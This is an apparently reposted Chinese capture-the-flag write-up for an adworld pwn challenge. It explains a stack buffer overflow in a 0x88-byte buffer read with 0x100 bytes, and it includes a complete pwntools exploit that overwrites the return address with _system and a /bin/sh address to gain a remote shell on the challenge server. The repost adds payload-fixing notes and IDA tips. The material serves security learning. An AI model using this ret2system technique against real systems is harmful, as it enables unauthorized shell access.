以下是adworld里endust师傅的wp
————————————————————————————————
checksec扫描
![在这里插入图片描述](https://img-blog.csdnimg.cn/e8d5d667500a4774b766bb70fcaf6e93.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6LS55YiX572X5aSn5bid,size_19,color_FFFFFF,t_70,g_se,x_16#pic_center)
使用ida打开可以发现,初始的buf的空间只有0x88,但是读取我们输入的内容的时候,选择的大小却是0x100,造成了溢出
![在这里插入图片描述](https://img-blog.csdnimg.cn/115023b17a0d4c1588fb9fcb81104713.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6LS55YiX572X5aSn5bid,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center)
通过这些,我们直接构建exp
from pwn import *
a = remote('111.198.29.45',36253)
##system函数的地址
sysaddr = 0x08048320
##程序中/bin/sh字符串所在的地址
binshaddr = 0x0804A024
##0x88是程序中缓冲区的大小,4个大小是需要覆盖的ebp的地址,之后是
##函数的返回地址,被system的地址覆盖了,进入到system函数之后,
##需要构造system函数的栈帧,因为ebp+8是形参的地址,所以需要四个
##字节的填充p32(0),后面放的是system里面的参数的地址。这样子溢出
##之后就会获得shell
payload = 'a'*0x88+'b'*4+p32(sysaddr)+p32(0)+p32(binshaddr)
a.send(payload)
a.interactive()
——————
搬运工注1:如果去adworld上买了这个wp的师傅直接用exp出了问题,是因为原作者的payload再b4后面多加了一个8,去掉就没问题了
注2:经过试验,p32似乎也需要转码,否则也会出现error
这个脚本可以获取控制权,ls一下可以看到flag就在目录里面
————————————————————————————————
*菜鸡的笔记
补两张图:
1,_system函数(注意,不是system函数,感谢另外一位师傅iyzyi的wp,注明了这一点)
![在这里插入图片描述](https://img-blog.csdnimg.cn/6c5a3f1d8ffb485097483288e7bcd216.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6LS55YiX572X5aSn5bid,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center)
——
这里system里面是command,也就是说只要有参数,就可以执行
![在这里插入图片描述](https://img-blog.csdnimg.cn/1ab5b3dd45d94fab9c2b5cfba655edc4.png#pic_center)
2,/bin/sh
![在这里插入图片描述](https://img-blog.csdnimg.cn/d7fb12f1763446b3a4581ab4e2610a17.png#pic_center)
找到了/bin/sh(怎么找到的我也不知道,研究出来的方法会放在后面),在payload里面连续相加,就相当于system(“/bin/sh”)
——————
寻找bin:ida搜索功能的快捷键是alt+T